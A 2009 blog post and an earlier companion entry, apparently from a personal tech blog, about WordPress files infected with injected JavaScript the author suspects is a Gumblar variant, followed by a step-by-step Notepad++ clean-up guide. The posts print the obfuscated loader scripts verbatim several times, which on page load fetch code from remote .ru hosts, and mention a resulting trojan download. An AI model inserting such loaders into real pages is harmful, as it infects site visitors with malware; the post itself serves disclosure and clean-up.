How-to Fix Malicious Javascript Code (suspected as variant of Gumblar virus)

Febryan Paudi — Wed, 09 Dec 2009 16:21:26 +0000

As yesterday, I found unknown code at the bottom of each wordpress file (javascript and homepage index files). Furthermore, the Javascript code will load malicious file from other remote servers, which are randomized. It works similar to Gumblar virus, though it has slightly different codes and action. So far, I've found this javascript malicious code with different var value. Nhbk5v835x5dq6, H3qqea3ur6p, and Jqjzlgspz98uxl. This code will load another malicious script from http://xtube-com.blogger.com.pornorama-com.bluejackmusic.ru:8080/hdfcbank.com/hdfcbank.com/google.com/fanpop.com/in.com/

<script>/*GNU GPL*/ try{window.onload = function(){var Jqjzlgspz98uxl = document.createElement('script');Jqjzlgspz98uxl.setAttribute('type', 'text/javascript');Jqjzlgspz98uxl.setAttribute('id', 'myscript1');Jqjzlgspz98uxl.setAttribute('src', 'h#&#t&#!t$!@p):)$/!&^/!x#^&t@#&u@b($!)e#(-)c^@$&o#(#m^!$^.&$)b$($l$o!(#&)g(&g)(^$e!$r#@(.@^& (c(o^#m@)!#.)#p!(@o&r@)n(^$o$!^r&!a$)&m$@a$^$@-!c((^o#($m!.&#b$^$l)^u!$!e((#@)j@@a@)@c#k)!^m^(u$$ !(s@$@i^@c@&.!@)r@u(!:(^8&@!)!0@)8)@#0&(!/$&)h^d$@$f$(^c^)b@$&a)^n^(k^#.&@^&c#(!#$o^m!)#/!h^@#d(&f)&c^()b#(a^$!n&^(#$k^#.!$c)o))m)&&/($&!g$$o!)o^()g))@(l$^@)e#^&.&&c^(o()m@!)(/(&f)#a!!@n!$@p))o)((p!^#.@c^!@o&@m)@&/@!!i&n^#!.&#!c)))!o(m#/)((!'.replace(/\(|\)|\^|\!|@|\$|#|&/ig, ''));Jqjzlgspz98uxl.setAttribute('defer', 'defer');document.body.appendChild(Jqjzlgspz98uxl) ;}} catch(e) {}</script>

This code will load another malicious script from http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/

<script>/*GNU GPL*/ try(window.onload = function()(var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAttribute('type','text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src', 'h#!##t&(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m.&!#g#@o((o^g)(l^$!$)@.&)$eco$#(m#^@.)#@#!#a&b$i#!$#$d^m^h#)$!(-!((!$s)n$&(.@)c^@$o((m!(&.^)(b&!)e@s(@&t@a()r#$#)t))s@#!#)a!l#e#r$(.))&!you!&):)8($0)@$8^#^@0&)$^/!!&w@$(O@^r(^(!d^p^@#)r#e@s^(s&&@@.(^^o^c#@!$)/)&^m$g@(@^o(^o@g@&#$l&&e^))&@-($(m)#)#a)i^l^#.!&^)i!$@^/((!(t&l)!i^v&(&(e()#j^a$&@s(&m$^&(i$#@n!#^-#@)p$!$$h!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$c!&^)&/)!m@o@c#&($n)e()&&t)#-^#!c^(n^^n@c&#).)!&!o$m#($/^a$&!@@b&()^o($(u!&#)t^#-#))$e@@)b##a#y&&@.&#(^c&o^^^^m@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);)) catch(e) ()</script>

This code will load another malicious script from http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/

<script>/*GNU GPL*/ try{window.onload = function(){var Nhbk5v835x5dq6 = document.createElement('script');Nhbk5v835x5dq6.setAttribute('type', 'text/javascript');Nhbk5v835x5dq6.setAttribute('id', 'myscript1');Nhbk5v835x5dq6.setAttribute('src',  'h#@#$t^@#t^^!p^$:&!/(/&##g)@o^)!o)!&g)^!l$(e^-&&!c$@@n).)#!#m$(#s#!))$n)!.&^c)(!!a&.$&(!s^@#h)@&o@(p$!^&)l$&o&^!c!&)@a&l)-$^c@(^o!m@.$e((a$s^^y#m(u(#)s&&@i$c(@s!@^t)o(r^#e!@@&.)!)r!^u(#:(!8(^0$#$8)0&@@/@i#@n)!t@e^#r(^i$)$^a)#.^&p&(!&l))#^$/@(!i$)^n#(&t^#&e&$(r)&#i$)$a(@.!p^l^$/^@#g#o@#(o)()g&$$l(^e@.&&$!c(^o)m^(/)@@e&^@m#&^@p($f&l^^@!i(x!))).&^!c@o$()$m&/##!&d#e)@b$)&o(##$n^#$a)^i$r(&b@#l!^o^g@@.)#c@$@o!m(&^)/!'.replace(/@|\!|\$|&|\)|\^|#|\(/ig, ''));Nhbk5v835x5dq6.setAttribute('defer', 'defer');document.body.appendChild(Nhbk5v835x5dq6);}} catch(e) {}</script>

Some of WordPress, Joomla, and Pligg users have reported this problem in several forums. I've successfully cleaned this virus from my iPhone blog and ryan-isra.net as well. This tutorial will guide you how to disinfect your WordPress blog from this virus. It's very recommended to have Notepad++ application installed in your Windows to make this process easier. You can download Notepad++ from this link. 1. Login to cPanel (if applicable) 2. Edit the content of index.php in root directory to be any text (i.e. Under Maintenance) to protect your visitors of being infected. 3. Create a zip file of wp-content directory, download it to local computer and extract it. 4. Use search feature and find all javascript files in wp-content folder. 5. Open Notepad++, then select all files in Search Results screen. Drag all files into Notepad++'s window. 6. Press CTRL+H key, paste the javascript malicious code in "Find what" field and leave empty the "Replace with" field. 7. When finished, click File - Save All or simply press CTRL+SHIFT+S key. 8. Repeat the step#4 and change *.js to *index* 9. Repeat the step#8 and change *index* to *default* 10. Remember the path of each file and then re-upload each file to its own path. 11. Get a fresh copy of wordpress, copy wp-admin and wp-includes directories, compress, and upload to your hosting. 12. Replace wp-admin and wp-includes directories in your hosting with the one that you just uploaded. 13. Now, ensure that your computer is clean of virus/keylogger/trojan and then change your cPanel/FTP password. The process could be simpler if you have never changed/customized any of your wordpress theme/plugins. You could simply re-upload a fresh wordpress installation, themes, plugins. I am so sleepy, sorry if something is wrong or missing. - Update - Please see these comments, some of them may help you better than my post. Thanks guys.

what most people search here: ryan-isra net, xtube virus, wordpress javascript virus, xtubes com, javascript virus, MALicious javascript download, javascript virus code, sim card inserted iphone does not appear supported, fix javascript code, xtube com, javascript malicious code, how to fix infected javascript

Malicious Javascript Code infected my blogs

Malicious Javascript Code infected my blogs

Febryan Paudi — Tue, 08 Dec 2009 14:46:32 +0000

It happened since yesterday. When I was checking my blogs, I got this error message in every page.

Parse error: syntax error, unexpected '<' in /home/$myhomedir$/public_html/wp-includes/default-widgets.php on line 1034

I immediately open default-widgets.php in wp-includes directory by using notepad, followed by pressing CTRL + G to go to line#1034. I'm very susprised when I found these codes were exist in default-widgets.php.

<script>/*GNU GPL*/ try{window.onload = function(){var Nhbk5v835x5dq6 = document.createElement('script');Nhbk5v835x5dq6.setAttribute('type', 'text/javascript');Nhbk5v835x5dq6.setAttribute('id', 'myscript1');Nhbk5v835x5dq6.setAttribute('src',  'h#@#$t^@#t^^!p^$:&!/(/&##g)@o^)!o)!&g)^!l$(e^-&&!c$@@n).)#!#m$(#s#!))$n)!.&^c)(!!a&.$&(!s^@#h)@&o@(p$!^&)l$&o&^!c!&)@a&l)-$^c@(^o!m@.$e((a$s^^y#m(u(#)s&&@i$c(@s!@^t)o(r^#e!@@&.)!)r!^u(#:(!8(^0$#$8)0&@@/@i#@n)!t@e^#r(^i$)$^a)#.^&p&(!&l))#^$/@(!i$)^n#(&t^#&e&$(r)&#i$)$a(@.!p^l^$/^@#g#o@#(o)()g&$$l(^e@.&&$!c(^o)m^(/)@@e&^@m#&^@p($f&l^^@!i(x!))).&^!c@o$()$m&/##!&d#e)@b$)&o(##$n^#$a)^i$r(&b@#l!^o^g@@.)#c@$@o!m(&^)/!'.replace(/@|\!|\$|&|\)|\^|#|\(/ig, ''));Nhbk5v835x5dq6.setAttribute('defer', 'defer');document.body.appendChild(Nhbk5v835x5dq6);}} catch(e) {}</script>

I also found similar malicious code from Google.

<script>/*GNU GPL*/ try(window.onload = function()(var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAttribute('type','text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src', 'h#!##t&(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m.&!#g#@o((o^g)(l^$!$)@.&)$eco$#(m#^@.)#@#!#a&b$i#!$#$d^m^h#)$!(-!((!$s)n$&(.@)c^@$o((m!(&.^)(b&!)e@s(@&t@a()r#$#)t))s@#!#)a!l#e#r$(.))&!you!&):)8($0)@$8^#^@0&)$^/!!&w@$(O@^r(^(!d^p^@#)r#e@s^(s&&@@.(^^o^c#@!$)/)&^m$g@(@^o(^o@g@&#$l&&e^))&@-($(m)#)#a)i^l^#.!&^)i!$@^/((!(t&l)!i^v&(&(e()#j^a$&@s(&m$^&(i$#@n!#^-#@)p$!$$h!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$c!&^)&/)!m@o@c#&($n)e()&&t)#-^#!c^(n^^n@c&#).)!&!o$m#($/^a$&!@@b&()^o($(u!&#)t^#-#))$e@@)b##a#y&&@.&#(^c&o^^^^m@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);)) catch(e) ()</script>

The 1st code above will load another malicious script from http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/, while the 2nd code above will load another malicious script from http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/ I could accessing my iPhone blog, though another error appeared: Can not modify header information - headers already sent by (output started at ... At the same time, InternetDownloadManager asked me to download ChangeLog.pdf from http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/pics/ChangeLog.pdf and MBAM (Malwarebytes' Anti-Malware) detected C:\Documents and Settings\username\Local Settings\Temp\0.5147965079164781.exe (random file name) as Trojan.Dropper. Kaspersky Anti-Virus 2009 couldn't detect it, but Kaspersky Anti-Virus 2010 detected it as unknow threat UDS: DangerousObject.Multi.Generic with High criticality. I understand that I was being infected by a virus, though I had no idea what kind of virus was that. Searched via Google by using

Ryan Isra | Tech | Life » Javascript

How-to Fix Malicious Javascript Code (suspected as variant of Gumblar virus)

Malicious Javascript Code infected my blogs